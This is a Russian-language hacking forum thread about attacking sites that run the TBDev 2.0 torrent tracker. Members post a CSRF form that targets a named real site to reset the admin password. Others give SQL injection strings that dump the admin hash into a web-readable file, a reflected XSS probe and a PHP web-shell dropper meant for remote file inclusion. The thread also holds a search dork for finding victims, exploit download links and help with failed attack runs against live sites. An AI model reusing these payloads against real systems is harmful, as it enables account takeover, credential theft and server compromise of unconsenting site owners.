Трекер-движок TBDev 2.0

Discussion in 'Веб-уязвимости' started by Qwazar, 5 Aug 2008.

  1. DJ ][akep

    DJ ][akep Member

    Joined:
    27 Jan 2008
    Messages:
    93
    Likes Received:
    20
    Reputations:
    1
    Спасибо все получилось.
    Еще вопрос.
    Реально с админки шел залить?
     
  2. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    как вариант ... конечно ... заифреймить админу такую HTML -ку

    HTML:
    <body onload="p.submit()">
    <form action="http://megalife.kz/torrent/admincp.php?op=iUsers" method="post" id="p"> 
    <input type=hidden name="iname" value="ИМЯ_АДМИНА">
    <input type=hidden name="ipass" value="НОВЫЙ_ПАРОЛЬ">
    <input type=hidden name="imail" value="МАЙЛ_АДМИНА@mail.ru">
    <input type=hidden name="isub" value="%D1%E4%E5%EB%E0%F2%FC">
    <input type=hidden name="op" value="iUsers">
    Как вы уже все поняли ... это сменит пароль нужному нам пользователю.... проявите немного фантазии и дело за малым ;)
     
    1 person likes this.
  3. Uname-A

    Uname-A Elder - Старейшина

    Joined:
    19 Aug 2008
    Messages:
    73
    Likes Received:
    12
    Reputations:
    5
    C:\php>php.exe sql.php http://adrez/ 1 123123123 123123
    http://adrez/:123123123:123123
    Trying to get your cookies... [DONE]
    Trying to get passhash:
    Exploit failed

    Пробывал сайтах на 5 везде одно и тоже .. Кто может помоч?
     
  4. n-000

    n-000 Elder - Старейшина

    Joined:
    25 Oct 2006
    Messages:
    90
    Likes Received:
    36
    Reputations:
    5
    Я попробую тебе помоч -))
    измени target_id с 1 на 3 или 4 или 10 ... вопщем посмотри id админа сначало и ставь его туда ...
    Т.к при установке этого движка в базу прописываеца не 1 ... у меня на локалхосте он равнялся 3
     
    #24 n-000, 10 Nov 2008
    Last edited: 10 Nov 2008
    2 people like this.
  5. Витян

    Витян Elder - Старейшина

    Joined:
    25 Dec 2006
    Messages:
    190
    Likes Received:
    83
    Reputations:
    14
    сделал видео _http://letitbit.net/download/262433962218/qwazar-sploit.rar.html
    _http://rapidshare.com/files/165895736/qwazar_sploit.rar.html

    Чтобы небыло вопросов, php из видео скачан отсюда _http://php.ru/download/php-5.2.1-Win32.zip
     
    #25 Витян, 21 Nov 2008
    Last edited: 21 Nov 2008
    1 person likes this.
  6. злойдядька

    Joined:
    20 Nov 2008
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    активные XSS в полях Email, Имя в AIM, Ваш MSN, Имя в Yahoo!, Имя в mIRC!, Сайт.
    Все работает если вводить при реге, если редактировать после реги, работать не будет.
    В поле Email скуля, тоесть при реге вводим мыло вида ' group by 100/*@blablabla.ru
    выдает что количество колонок не верное.
    Пример получения хеша админа:
    в поле имейл пишем :' union select passhash from users where id=1 into outfile '../../../usr/local/www/torrent/torrents/images/1.txt'/* -- @ukrnet.ua

    по адрессу h**p://сайт/torrents/images/1.txt смотрим хеш юзера с id=1
    пассивная хss www.site.ru/redir.php?url='><script>alert(/xak/)</script>
     
    #26 злойдядька, 23 Nov 2008
    Last edited: 8 Dec 2008
    1 person likes this.
  7. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    TBDev2 Blind SQL Injection+RFI Exploit

    Сплоит для TBDev 2.0. , от паблик версии отличается тем, что пытается залить шелл на сервер, помимо поиска пасса/соли. Если шелл залить не удаётся, значит вместо RFI прийдётся использовать LFI, или на сервере не работает функция file_put_contents, которую вполне можно заменить на обычный fopen/fwrite.

    LFI/RFI в админке используя параметр admincp.php?rootpath=.

    Если register_globals ON, то LFI/RFI доступны и не из админки, а из index.php, тот же параметр.

    Читайте комментарии к сплоиту, для заливки шелла, нужно положить код
    Code:
    <?php
      file_put_contents("torrents/.htaccess", "");
      file_put_contents("torrents/shell.php", "<? system(\$_GET['cmd']) ?>");
    ?>
    В файл доступный для чтения, на вашем сервере и прописать путь к нему в переменной $uploader.

    Так же сплоит может просто вытащить хеш, соль не закачивая шелл. Используется алгоритм бинарного поиска, так что запросов шлётся относительно немного, для слепой скули. (максимум 4 запроса на символ, вместо стабильно 16 при полном переборе, т.е. работает минимум в 4 раза быстрее, чем при полном переборе. И вообще для всех сплоитов со слепыми скулями, использующих BENCHMARK или перебор имён таблиц, стоит использовать алгоритм бинарного поиска, так быстрее)

    P.S.
    В каталоге 'admin' вообще лежит файлик (core.php) следующего содержания:
    Code:
    $op = (!isset($_REQUEST['op'])) ? "Main" : $_REQUEST['op'];
    
    foreach ($_GET as $key => $value)
    	$GLOBALS[$key] = $value;
    foreach ($_POST as $key => $value)
    	$GLOBALS[$key] = $value;
    foreach ($_COOKIE as $key => $value)
    	$GLOBALS[$key] = $value;
    Этот файл инклудится в admin.php .

    Dork:"Powered by TBDev v2.0"

    Качать тут: http://www.x2b.ru/get/14887
     
    9 people like this.
  8. pacan4ik

    pacan4ik New Member

    Joined:
    2 Nov 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    &

    Can't create/write to file '..\..\..\usr\local\www\torrent\torrents\images\1.txt' (Errcode: 2)
     
  9. Red Virus

    Red Virus New Member

    Joined:
    11 Aug 2008
    Messages:
    9
    Likes Received:
    2
    Reputations:
    0
    Запрос в поле майл делаю правильно новсе время вылетает ошибка

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/* -- @uspp.ru'' at line 1

    хотя на локальной машине все робит на ура вчем проблема может быть ?
     
  10. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    Errcode 2 означает что папка не существует(т.е путь не правильный)... ;)
    Если прав не хватает то Errcode 13
    ;)
    special for roa :p
     
    #30 aka PSIH, 9 Dec 2008
    Last edited: 9 Dec 2008
    1 person likes this.
  11. Dimazzan

    Dimazzan New Member

    Joined:
    23 Jun 2008
    Messages:
    0
    Likes Received:
    4
    Reputations:
    0
    Помогите с проблемой
     
  12. DIMON4G

    DIMON4G Elder - Старейшина

    Joined:
    25 May 2008
    Messages:
    0
    Likes Received:
    108
    Reputations:
    -1
    выложи видео пожалуйста на депоситфайлс.
     
  13. Витян

    Витян Elder - Старейшина

    Joined:
    25 Dec 2006
    Messages:
    190
    Likes Received:
    83
    Reputations:
    14
    http://depositfiles.com/files/w2ggoxnsd
     
    1 person likes this.
  14. DIMON4G

    DIMON4G Elder - Старейшина

    Joined:
    25 May 2008
    Messages:
    0
    Likes Received:
    108
    Reputations:
    -1
    Витян эх, данное чудо уже не работает ((( больше никаких уязвимостей не знаешь (приват) :) ?
     
    2 people like this.
  15. DIMON4G

    DIMON4G Elder - Старейшина

    Joined:
    25 May 2008
    Messages:
    0
    Likes Received:
    108
    Reputations:
    -1
    +1 также, мож это всё лажа.... :(
     
    1 person likes this.
  16. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Ну дык, сколько времени уже прошло, на сайте разработчика уже исправления для этой баги выложили.
     
  17. Dimazzan

    Dimazzan New Member

    Joined:
    23 Jun 2008
    Messages:
    0
    Likes Received:
    4
    Reputations:
    0
    Эта штука не пашет!!!
     
  18. Dimazzan

    Dimazzan New Member

    Joined:
    23 Jun 2008
    Messages:
    0
    Likes Received:
    4
    Reputations:
    0
    Эта штука еще актуально на Sky-Tracker

    http://www.google.ru/search?hl=ru&q=Powered+by+Sky-Tracker&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=
     
    1 person likes this.
  19. holden321

    holden321 New Member

    Joined:
    31 Oct 2008
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    подскажите, зайдя на сайт как админ или сисоп я могу изменить файлы движковые или записать новые? хотябы в принципе это возможно или нет?
    Sky-Tracker
     
  20. Red Virus

    Red Virus New Member

    Joined:
    11 Aug 2008
    Messages:
    9
    Likes Received:
    2
    Reputations:
    0
    можно ... залить шел